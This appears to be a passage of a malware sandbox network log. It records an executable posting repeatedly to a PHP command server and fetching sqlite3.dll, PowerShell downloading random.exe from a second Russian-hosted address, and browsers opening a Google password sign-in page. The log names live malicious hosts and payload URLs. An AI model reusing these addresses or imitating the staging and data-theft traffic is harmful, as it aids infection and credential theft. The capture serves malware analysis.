                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:02 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.115/c4becf79229cb002.php
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              POST /c4becf79229cb002.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----GCBKFBFCGIEHIDGCFBFB
                                                                                              Host: 185.215.113.115
                                                                                              Content-Length: 211
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:02 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Length: 180
                                                                                              Keep-Alive: timeout=5, max=99
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.115/c4becf79229cb002.php
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              POST /c4becf79229cb002.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJ
                                                                                              Host: 185.215.113.115
                                                                                              Content-Length: 268
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:02 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Length: 2028
                                                                                              Keep-Alive: timeout=5, max=98
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.115/c4becf79229cb002.php
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              POST /c4becf79229cb002.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----IECBGIDAEHCGDGCBKEBG
                                                                                              Host: 185.215.113.115
                                                                                              Content-Length: 267
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:02 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Length: 7116
                                                                                              Keep-Alive: timeout=5, max=97
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.115/c4becf79229cb002.php
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              POST /c4becf79229cb002.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----FHIECBAFBFHIJKFIJDAK
                                                                                              Host: 185.215.113.115
                                                                                              Content-Length: 268
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:02 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Length: 108
                                                                                              Keep-Alive: timeout=5, max=96
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.115/c4becf79229cb002.php
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              POST /c4becf79229cb002.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----AFHDBGHJKFIDHJJJEBKE
                                                                                              Host: 185.215.113.115
                                                                                              Content-Length: 4871
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:02 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=95
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.115/68b591d6548ec281/sqlite3.dll
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              GET /68b591d6548ec281/sqlite3.dll HTTP/1.1
                                                                                              Host: 185.215.113.115
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:03 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                              ETag: "10e436-5e7ec6832a180"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 1106998
                                                                                              Content-Type: application/x-msdos-program
                                                                                            • flag-gb
                                                                                              GET
                                                                                              http://www.google.com/
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:80
                                                                                              Request
                                                                                              GET / HTTP/1.1
                                                                                              Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                              Accept-Language: en
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                              Host: www.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:03 GMT
                                                                                              Expires: -1
                                                                                              Cache-Control: private, max-age=0
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-vlkUnzNS8orPiWJMcWff7A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                              Content-Encoding: gzip
                                                                                              Server: gws
                                                                                              Content-Length: 1884
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Set-Cookie: AEC=AVcja2dtSHazVHyaoG5yx_Sz4f0pEeHr-kMqThBfGjAXGjFc2SvaitnVNDw; expires=Tue, 19-Aug-2025 00:34:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                            • flag-gb
                                                                                              GET
                                                                                              http://www.google.com/
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:80
                                                                                              Request
                                                                                              GET / HTTP/1.1
                                                                                              Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                              Accept-Language: en
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                              Host: www.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:03 GMT
                                                                                              Expires: -1
                                                                                              Cache-Control: private, max-age=0
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-aWwRdoxknYv34jcywl7xbQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                              Content-Encoding: gzip
                                                                                              Server: gws
                                                                                              Content-Length: 1884
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Set-Cookie: AEC=AVcja2eIqMLXcoOSxJniONaebvKYndpUPcodMoDBs1Sou8Ln2J_NsmrFLKQ; expires=Tue, 19-Aug-2025 00:34:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                            • flag-gb
                                                                                              GET
                                                                                              http://www.google.com/
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:80
                                                                                              Request
                                                                                              GET / HTTP/1.1
                                                                                              Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                              Accept-Language: en
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                              Host: www.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:03 GMT
                                                                                              Expires: -1
                                                                                              Cache-Control: private, max-age=0
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-kfFvhOhtTb2Scl05K5zemw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                              Content-Encoding: gzip
                                                                                              Server: gws
                                                                                              Content-Length: 1884
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Set-Cookie: AEC=AVcja2c_ywcnvLVk_Y4el39r0FHeuW6VR_C2fUc2eqGhL93ehjrFAAQN1Lg; expires=Tue, 19-Aug-2025 00:34:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                            • flag-gb
                                                                                              GET
                                                                                              http://www.google.com/
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:80
                                                                                              Request
                                                                                              GET / HTTP/1.1
                                                                                              Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                              Accept-Language: en
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                              Host: www.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:03 GMT
                                                                                              Expires: -1
                                                                                              Cache-Control: private, max-age=0
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-8bcnmaMB4QYtfT4DLgZiqw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                              Content-Encoding: gzip
                                                                                              Server: gws
                                                                                              Content-Length: 1884
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Set-Cookie: AEC=AVcja2fLh1qkYA2pchw5drjiv8V6awcJPAa-P1OXhpBoPX8Qdu6Ybz1g2A; expires=Tue, 19-Aug-2025 00:34:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                            • flag-gb
                                                                                              GET
                                                                                              http://www.google.com/
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:80
                                                                                              Request
                                                                                              GET / HTTP/1.1
                                                                                              Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                              Accept-Language: en
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                              Host: www.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:03 GMT
                                                                                              Expires: -1
                                                                                              Cache-Control: private, max-age=0
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-FsMBO--y7dhkk-y13HgyBw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                              Content-Encoding: gzip
                                                                                              Server: gws
                                                                                              Content-Length: 1884
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Set-Cookie: AEC=AVcja2fRyub5vPfq8Ina0t88PUZj3Jt81-Xf8HKp7iKWZCbKskQO32bqwQ; expires=Tue, 19-Aug-2025 00:34:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                            • flag-gb
                                                                                              GET
                                                                                              http://www.google.com/
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:80
                                                                                              Request
                                                                                              GET / HTTP/1.1
                                                                                              Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                              Accept-Language: en
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                              Host: www.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:03 GMT
                                                                                              Expires: -1
                                                                                              Cache-Control: private, max-age=0
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-13RL75uP7kUaG9NM4dVHVA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                              Content-Encoding: gzip
                                                                                              Server: gws
                                                                                              Content-Length: 1884
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Set-Cookie: AEC=AVcja2dA4nZcFqqQa9VHEt-lHx3q6y8_LmslgXHo3DKT00mUk0GOGVQqVrc; expires=Tue, 19-Aug-2025 00:34:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                            • flag-gb
                                                                                              GET
                                                                                              http://www.google.com/
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:80
                                                                                              Request
                                                                                              GET / HTTP/1.1
                                                                                              Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                              Accept-Language: en
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                              Host: www.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:03 GMT
                                                                                              Expires: -1
                                                                                              Cache-Control: private, max-age=0
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-sjtkYHIKyn9xSh6FtEf0yg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                              Content-Encoding: gzip
                                                                                              Server: gws
                                                                                              Content-Length: 1884
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Set-Cookie: AEC=AVcja2c1diw40PNar7vJ1F2sHwokah1ujk9xLpHLrxJCW774ytChFPODAQ; expires=Tue, 19-Aug-2025 00:34:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.86.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D2%2526e%253D1
                                                                                              chrome.exe
                                                                                              Remote address:
                                                                                              172.217.169.78:443
                                                                                              Request
                                                                                              GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.86.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D2%2526e%253D1 HTTP/2.0
                                                                                              host: clients2.google.com
                                                                                              sec-fetch-site: none
                                                                                              sec-fetch-mode: no-cors
                                                                                              sec-fetch-dest: empty
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                              accept-encoding: gzip, deflate, br, zstd
                                                                                              accept-language: en-US,en;q=0.9
                                                                                              cookie: __Secure-ENID=25.SE=FqFe7UrTzzFPR0IaYsuhGNML1XH-htbGRn0dSMEcfFldrc08ldcRazHN8GZGWbmVFuVsOI2vcDBF9bcc_zkaTICskZXh9eqH4jq9AxT6nwu8iCXpFh2hJ3dFuiu6dKmX4HiNm3rIQi1BdlPVu-RTP-qSptzztOtor9nxszvH3Mqsq9h-Kdr_rnlDqZ_aHUJki6Q-bZLaiBTm
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://www.google.com/async/ddljson?async=ntp:2
                                                                                              chrome.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:443
                                                                                              Request
                                                                                              GET /async/ddljson?async=ntp:2 HTTP/2.0
                                                                                              host: www.google.com
                                                                                              sec-fetch-site: none
                                                                                              sec-fetch-mode: no-cors
                                                                                              sec-fetch-dest: empty
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                              accept-encoding: gzip, deflate, br, zstd
                                                                                              accept-language: en-US,en;q=0.9
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                              chrome.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:443
                                                                                              Request
                                                                                              GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
                                                                                              host: www.google.com
                                                                                              x-client-data: CNCIywE=
                                                                                              sec-fetch-site: cross-site
                                                                                              sec-fetch-mode: no-cors
                                                                                              sec-fetch-dest: empty
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                              accept-encoding: gzip, deflate, br, zstd
                                                                                              accept-language: en-US,en;q=0.9
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://www.google.com/async/newtab_promos
                                                                                              chrome.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:443
                                                                                              Request
                                                                                              GET /async/newtab_promos HTTP/2.0
                                                                                              host: www.google.com
                                                                                              sec-fetch-site: cross-site
                                                                                              sec-fetch-mode: no-cors
                                                                                              sec-fetch-dest: empty
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                              accept-encoding: gzip, deflate, br, zstd
                                                                                              accept-language: en-US,en;q=0.9
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.16/mine/random.exe
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              185.215.113.16:80
                                                                                              Request
                                                                                              GET /mine/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.16
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:06 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 2134016
                                                                                              Last-Modified: Wed, 19 Feb 2025 23:46:05 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b66d3d-209000"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-us
                                                                                              DNS
                                                                                              yahoo.com
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              yahoo.com
                                                                                              IN MX
                                                                                              Response
                                                                                              yahoo.com
                                                                                              IN MX
                                                                                              mta6am0yahoodnsnet
                                                                                              yahoo.com
                                                                                              IN MX
                                                                                              mta7�.
                                                                                              yahoo.com
                                                                                              IN MX
                                                                                              mta5�.
                                                                                            • flag-us
                                                                                              DNS
                                                                                              mta6.am0.yahoodns.net
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              mta6.am0.yahoodns.net
                                                                                              IN A
                                                                                              Response
                                                                                              mta6.am0.yahoodns.net
                                                                                              IN A
                                                                                              67.195.204.73
                                                                                              mta6.am0.yahoodns.net
                                                                                              IN A
                                                                                              67.195.228.110
                                                                                              mta6.am0.yahoodns.net
                                                                                              IN A
                                                                                              67.195.204.74
                                                                                              mta6.am0.yahoodns.net
                                                                                              IN A
                                                                                              98.136.96.91
                                                                                              mta6.am0.yahoodns.net
                                                                                              IN A
                                                                                              67.195.228.94
                                                                                              mta6.am0.yahoodns.net
                                                                                              IN A
                                                                                              67.195.204.79
                                                                                              mta6.am0.yahoodns.net
                                                                                              IN A
                                                                                              67.195.228.106
                                                                                              mta6.am0.yahoodns.net
                                                                                              IN A
                                                                                              98.136.96.77
                                                                                            • flag-us
                                                                                              DNS
                                                                                              youtube.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              youtube.com
                                                                                              IN A
                                                                                              Response
                                                                                              youtube.com
                                                                                              IN A
                                                                                              142.250.179.238
                                                                                            • flag-us
                                                                                              DNS
                                                                                              spocs.getpocket.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              spocs.getpocket.com
                                                                                              IN A
                                                                                              Response
                                                                                              spocs.getpocket.com
                                                                                              IN CNAME
                                                                                              prod.ads.prod.webservices.mozgcp.net
                                                                                              prod.ads.prod.webservices.mozgcp.net
                                                                                              IN A
                                                                                              34.117.188.166
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              142.250.179.238:443
                                                                                              Request
                                                                                              GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
                                                                                              host: youtube.com
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                                                                              accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              accept-language: en-US,en;q=0.5
                                                                                              accept-encoding: gzip, deflate, br
                                                                                              upgrade-insecure-requests: 1
                                                                                              sec-fetch-dest: document
                                                                                              sec-fetch-mode: navigate
                                                                                              sec-fetch-site: none
                                                                                              sec-fetch-user: ?1
                                                                                              te: trailers
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              142.250.179.238:443
                                                                                              Request
                                                                                              GET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/2.0
                                                                                              host: www.youtube.com
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                                                                              accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              accept-language: en-US,en;q=0.5
                                                                                              accept-encoding: gzip, deflate, br
                                                                                              upgrade-insecure-requests: 1
                                                                                              sec-fetch-dest: document
                                                                                              sec-fetch-mode: navigate
                                                                                              sec-fetch-site: none
                                                                                              sec-fetch-user: ?1
                                                                                              te: trailers
                                                                                            • flag-us
                                                                                              DNS
                                                                                              youtube.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              youtube.com
                                                                                              IN A
                                                                                              Response
                                                                                              youtube.com
                                                                                              IN A
                                                                                              142.250.179.238
                                                                                            • flag-us
                                                                                              DNS
                                                                                              prod.ads.prod.webservices.mozgcp.net
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              prod.ads.prod.webservices.mozgcp.net
                                                                                              IN A
                                                                                              Response
                                                                                              prod.ads.prod.webservices.mozgcp.net
                                                                                              IN A
                                                                                              34.117.188.166
                                                                                            • flag-us
                                                                                              DNS
                                                                                              prod.content-signature-chains.prod.webservices.mozgcp.net
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              prod.content-signature-chains.prod.webservices.mozgcp.net
                                                                                              IN A
                                                                                              Response
                                                                                              prod.content-signature-chains.prod.webservices.mozgcp.net
                                                                                              IN A
                                                                                              34.160.144.191
                                                                                            • flag-us
                                                                                              DNS
                                                                                              prod.content-signature-chains.prod.webservices.mozgcp.net
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              prod.content-signature-chains.prod.webservices.mozgcp.net
                                                                                              IN AAAA
                                                                                              Response
                                                                                              prod.content-signature-chains.prod.webservices.mozgcp.net
                                                                                              IN AAAA
                                                                                              2600:1901:0:92a9::
                                                                                            • flag-us
                                                                                              DNS
                                                                                              youtube.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              youtube.com
                                                                                              IN AAAA
                                                                                              Response
                                                                                              youtube.com
                                                                                              IN AAAA
                                                                                              2a00:1450:4009:81d::200e
                                                                                            • flag-us
                                                                                              DNS
                                                                                              prod.ads.prod.webservices.mozgcp.net
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              prod.ads.prod.webservices.mozgcp.net
                                                                                              IN AAAA
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              shavar.prod.mozaws.net
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              shavar.prod.mozaws.net
                                                                                              IN A
                                                                                              Response
                                                                                              shavar.prod.mozaws.net
                                                                                              IN A
                                                                                              34.209.7.244
                                                                                              shavar.prod.mozaws.net
                                                                                              IN A
                                                                                              52.24.11.115
                                                                                              shavar.prod.mozaws.net
                                                                                              IN A
                                                                                              34.208.172.229
                                                                                            • flag-us
                                                                                              DNS
                                                                                              shavar.prod.mozaws.net
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              shavar.prod.mozaws.net
                                                                                              IN AAAA
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              prod.remote-settings.prod.webservices.mozgcp.net
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              prod.remote-settings.prod.webservices.mozgcp.net
                                                                                              IN A
                                                                                              Response
                                                                                              prod.remote-settings.prod.webservices.mozgcp.net
                                                                                              IN A
                                                                                              34.149.100.209
                                                                                            • flag-us
                                                                                              DNS
                                                                                              prod.remote-settings.prod.webservices.mozgcp.net
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              prod.remote-settings.prod.webservices.mozgcp.net
                                                                                              IN AAAA
                                                                                              Response
                                                                                              prod.remote-settings.prod.webservices.mozgcp.net
                                                                                              IN AAAA
                                                                                              2600:1901:0:c47c::
                                                                                            • flag-us
                                                                                              DNS
                                                                                              www.youtube.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              www.youtube.com
                                                                                              IN A
                                                                                              Response
                                                                                              www.youtube.com
                                                                                              IN CNAME
                                                                                              youtube-ui.l.google.com
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              216.58.213.14
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
